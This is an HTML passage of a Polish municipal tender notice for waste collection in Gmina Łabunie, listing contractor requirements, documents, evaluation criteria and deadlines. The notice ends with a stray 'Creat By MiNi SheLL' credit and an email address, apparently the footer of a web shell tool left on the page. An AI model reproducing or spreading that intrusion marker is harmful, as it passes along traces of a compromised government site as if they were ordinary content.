<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że posiada uprawnienia do wykonywania działalności tj posiada jedno z niżej wymienionych zezwoleń: - zezwolenie na transport odpadów wydane na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach w zakresie frakcji odpadów objętych zamówieniem lub zezwolenie na odzysk i unieszkodliwianie odpadów we wskazanym zakresie i na podstawie art. 45 ustawy z dnia 14 grudnia 2012 r. jest zwolniony z obowiązku uzyskania zezwolenia na transport odpadów, albo; - zezwolenie na zbieranie lub zbieranie i przetwarzanie odpadów wydane na podstawie art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U z 2013 r, poz. 21 z późn. zm) oraz; -wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska ( o którym mowa wart. 87 ustawy z dnia 11 września 2015 r. o zużytym sprzęcie elektrycznym i elektronicznym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że; wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedna usługę polegającą w szczególności na odbiorze i transporcie odpadów komunalnych na rzecz właścicieli nieruchomości w sposób ciągły przez okres nie krótszy niż 12 kolejnych miesięcy o łącznej masie odebranych odpadów nie mniej niż 500 Mg. Masa odebranych odpadów może być z co najwyżej dwóch gmin. Wykaz może być przedstawiony jako poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że spełnia warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. tj. :
1) dysponuje następującymi narzędziami i urządzeniami opisanymi w pkt 3.3 tj.: 
-bazą magazynowo -transportowa usytuowaną  w odległości nie większej niż 60 km od granicy Gminy Łabunie, na terenie do którego posiada tytuł prawny 
- posiada co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej oraz samochód dostawczy lub terenowy przystosowany do odbioru odpadów komunalnych z możliwością wjazdu na drogi gminne o szerokości  od 2,4m do 3,0 m i masie rzeczywistej do 5 ton. 
2) posiada bazę magazynowo-transportową spełniającą wymogi opisane w SIWZ,
3)zatrudnia pracowników uprawnionych do obsługi pojazdów i narzędzi  potrzebnych do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że spełnia warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że, posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Warunki płatnści - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy w stosunku do treści  oferty Wykonawcy w zakresie wynagrodzenia, o którym mowa w§ 9 ust. 1 dopuszczalna jest  w  przypadku:
1) zmiany stawki podatku od towarów i usług
2)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
3)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub  wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę 
2. W przypadku konieczności zmian umowy, w zakresie o którym mowa w ust. poprzedzającym  ustala się, że zmiany mogą zostać dokonane jedynie na pisemny i uzasadniony wniosek stron.
3. Wykonawca do wniosku o którym mowa w ust. poprzedzającym zobowiązany jest załączyć wszelkie dowody na potwierdzenie, że zmiany prawa w zakresie określonym w §12 ust. 1 niniejszej umowy miały wpływ na koszty wykonania zamówienia.
4. Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności formy pisemnej.
5. W trakcie trwania umowy Wykonawca zobowiązuje się do pisemnego powiadomienia Zamawiającego o;
1) zmianie siedziby lub nazwy firmy,
2) zmianie osób reprezentujących,
3) ogłoszenia upadłości,
4) ogłoszenia likwidacji,
5) zawieszenia działalności,
6) wszczęcia postępowania układowego, w którym uczestniczy Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uglabunie.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia uzyskać można w tut. Urzędzie Gminy Łabunie ul. Zamojska 50, 22-437 Łabunie, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2016 godzina 09:00, miejsce: Urząd Gminy Łabunie ul. Zamojska 50, 22-437 Łabunie, pokój Nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com